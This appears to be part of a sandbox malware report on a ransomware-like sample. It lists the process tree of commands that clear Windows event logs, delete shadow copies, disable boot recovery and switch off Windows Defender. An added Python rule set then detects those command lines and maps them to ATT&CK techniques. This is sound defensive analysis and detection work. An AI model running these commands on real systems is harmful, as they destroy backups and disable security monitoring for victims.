  2  PID 1480  C:\Windows\system32\wevtutil.exe
     cmd: wevtutil.exe cl system
     - Suspicious use of AdjustPrivilegeToken
  2  PID 1908  C:\Windows\system32\wevtutil.exe
     cmd: wevtutil.exe cl security
     - Suspicious use of AdjustPrivilegeToken
  2  PID 1408  C:\Windows\system32\wevtutil.exe
     cmd: wevtutil.exe cl application
     - Suspicious use of AdjustPrivilegeToken
  2  PID 276   C:\Windows\System32\Wbem\wmic.exe
     cmd: wmic.exe SHADOWCOPY /nointeractive
     - Suspicious use of AdjustPrivilegeToken
  2  PID 1660  C:\Windows\System32\Wbem\wmic.exe
     cmd: wmic.exe shadowcopy delete
     - Suspicious use of AdjustPrivilegeToken
  2  PID 556   C:\Windows\system32\bcdedit.exe
     cmd: bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
     - Modifies boot configuration data using bcdedit
  2  PID 616   C:\Windows\system32\bcdedit.exe
     cmd: bcdedit.exe /set {default} recoveryenabled no
     - Modifies boot configuration data using bcdedit
  2  PID 996   C:\Windows\system32\cmd.exe
     cmd: cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
    3  PID 1656  C:\Program Files\Windows Defender\MpCmdRun.exe
       cmd: "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
       - Deletes Windows Defender Definitions
  2  PID 852   C:\Windows\system32\cmd.exe
     cmd: cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
    3  PID 1840  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
       cmd: powershell Set-MpPreference -DisableIOAVProtection $true
       - Suspicious behavior: EnumeratesProcesses
  2  PID 2076  C:\Windows\system32\cmd.exe
     cmd: cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
    3  PID 2096  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
       cmd: powershell Set-MpPreference -DisableRealtimeMonitoring $true
       - Suspicious behavior: EnumeratesProcesses
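The process tree above is a compact catalogue of the steps this sample takes before encrypting: stop and disable backup and security services (net stop, sc config), switch Windows Defender off through policy keys, service Start values, scheduled tasks and Set-MpPreference, remove its definitions with MpCmdRun, delete shadow copies twice over (vssadmin and wmic), turn off Windows recovery with bcdedit, and clear the System, Security and Application logs with wevtutil. Every one of these is a plain command line, which is what a Sysmon Event ID 1 or Security 4688 record carries. The Python below is an added example, not part of the sandbox report: a small rule set that classifies such command lines, attributes them to ATT&CK techniques, and only raises an alert when recovery inhibition is combined with log clearing or AV tampering in the same process tree, since a lone "vssadmin delete shadows" is also run by administrators. The rule names, the alert logic and the technique assignments are mine; the ATT&CK IDs are the current sub-technique IDs, not the "Enterprise v6" IDs the report's heading refers to. SAMPLE_COMMAND_LINES are copied from the tree above except the last, which is constructed and marked as such.

```python
"""Classify the command lines from this report's process tree.

Added example; not part of the sandbox report. Input is command-line text
only (e.g. the CommandLine field of Sysmon Event ID 1 or Security 4688).
Rule names, technique assignments and the alert condition are the author's
choices; ATT&CK IDs are current sub-technique IDs.
"""
import re
from collections import Counter
from typing import Dict, List, Tuple

# (rule name, ATT&CK technique, pattern). Patterns are anchored on the
# utility name with \b so that the tool must appear as a token (either as
# "vssadmin" or "vssadmin.exe"), and are case-insensitive because Windows is.
RULES: List[Tuple[str, str, re.Pattern]] = [
    ("vssadmin_delete_shadows", "T1490",
     re.compile(r"\bvssadmin(\.exe)?\s+delete\s+shadows\b", re.I)),
    ("wmic_shadowcopy_delete", "T1490",
     re.compile(r"\bwmic(\.exe)?\s+shadowcopy\s+delete\b", re.I)),
    ("bcdedit_disable_recovery", "T1490",
     re.compile(r"\bbcdedit(\.exe)?\b.*\b(recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)\b", re.I)),
    ("wevtutil_clear_log", "T1070.001",
     re.compile(r"\bwevtutil(\.exe)?\s+cl\s+\S+", re.I)),
    ("mpcmdrun_remove_definitions", "T1562.001",
     re.compile(r"\bmpcmdrun\.exe\b.*-removedefinitions\b", re.I)),
    ("set_mppreference_disable", "T1562.001",
     re.compile(r"\bset-mppreference\s+-disable\w+\s+\$true\b", re.I)),
    ("reg_tamper_defender", "T1562.001",
     re.compile(r'\breg(\.exe)?\s+(add|delete)\s+"?hklm\\'
                r"(system\\currentcontrolset\\services\\"
                r"(windefend|wdboot|wdfilter|wdnisdrv|wdnissvc|securityhealthservice)"
                r"|software\\policies\\microsoft\\windows defender)", re.I)),
    ("schtasks_disable_defender_task", "T1562.001",
     re.compile(r"\bschtasks(\.exe)?\b.*\\windows defender\\.*\s/disable\b", re.I)),
    # Scoped to backup and security services; stopping other services is
    # too common to alert on by itself.
    ("stop_backup_or_security_service", "T1489",
     re.compile(r'\bnet1?(\.exe)?\s+stop\s+"?(vss|wbengine|sdrsvc|samss)\b', re.I)),
    ("sc_config_service_disabled", "T1489",
     re.compile(r"\bsc(\.exe)?\s+config\s+.*\bstart=\s*disabled\b", re.I)),
]


def classify(cmdline: str) -> List[Tuple[str, str]]:
    """All (rule name, technique) pairs a single command line triggers."""
    return [(name, tech) for name, tech, pat in RULES if pat.search(cmdline)]


def assess(cmdlines: List[str]) -> Dict[str, object]:
    """Score one process tree's worth of command lines.

    The alert fires only when recovery inhibition (T1490) co-occurs with
    log clearing (T1070.001) or AV tampering (T1562.001): that combination
    is what this report shows, and it is not something an administrator
    does by accident."""
    hits: List[Tuple[str, str, str]] = []
    for line in cmdlines:
        for rule, tech in classify(line):
            hits.append((line, rule, tech))
    techniques = Counter(tech for _, _, tech in hits)
    alert = "T1490" in techniques and (
        "T1070.001" in techniques or "T1562.001" in techniques
    )
    return {"hits": hits, "techniques": dict(techniques), "alert": alert}


# Copied from the process tree above, except the last entry.
SAMPLE_COMMAND_LINES = [
    r'net.exe stop "VSS" /y',
    r'C:\Windows\system32\net1 stop "VSS" /y',
    r'sc.exe config "wbengine" start= disabled',
    r'reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f',
    r'reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f',
    r'schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable',
    r'vssadmin.exe delete shadows /all /quiet',
    r'wevtutil.exe cl security',
    r'wmic.exe shadowcopy delete',
    r'bcdedit.exe /set {default} recoveryenabled no',
    r'"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All',
    r'powershell Set-MpPreference -DisableRealtimeMonitoring $true',
    # Constructed, not from the report: a service stop outside the rule's scope.
    r'net.exe stop "Spooler" /y',
]

if __name__ == "__main__":
    result = assess(SAMPLE_COMMAND_LINES)
    for line, rule, tech in result["hits"]:
        print(f"{tech:10} {rule:34} {line}")
    print("techniques:", result["techniques"])
    print("alert:", result["alert"])
```

Two caveats a detection engineer will want alongside this. First, the report shows the sample using cmd.exe as an intermediary for MpCmdRun and PowerShell, so the same tokens appear twice in the tree (once in the cmd.exe command line, once in the child's); dedupe on the child process if you count hits. Second, clearing the logs is itself logged: "wevtutil cl security" produces Security Event ID 1102 and clearing System or Application produces System Event ID 104, so those records survive as a second detection path when the process-creation telemetry is missed.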
Network
MITRE ATT&CK Enterprise v6
Downloads
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  MD5: 1b9d07fbbb8d5c47ecb6b0a710d962d7
  SHA1: b890276d079e5c11cbbdc7059d49be19d05a62de
  SHA256: 15c61e4b39e64d2726daf765d11fdbcfa708c84f657e526d54281f370fd441bb
  SHA512: 23a55aa7bc512ee4a7ec8e3f575e3f0826f75141e9a9502e20cc7832ba4011d820c593b451bb468cb4c3652d61d37f414b640b7c5fb2dfe037c92922a02e41ac